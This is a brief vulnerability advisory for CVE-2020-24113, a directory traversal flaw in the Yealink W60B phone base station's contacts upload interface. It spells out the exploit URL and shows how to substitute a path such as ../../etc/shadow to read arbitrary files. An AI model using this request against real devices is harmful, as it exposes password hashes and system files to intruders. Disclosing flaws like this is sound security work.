Headline
CVE-2020-24113
Directory Traversal vulnerability in Contacts File Upload Interface in Yealink W60B version 77.83.0.85, allows attackers to gain sensitive information and cause a denial of service (DoS).
You go to https://{IP}/servlet?m=mod_data&p=contacts-preview&q=load&handsetid=7&filename={file} and substitute the {file} parameter with the file you want to read, i.e. …/…/etc/shadow or …/…/proc/cpuinfo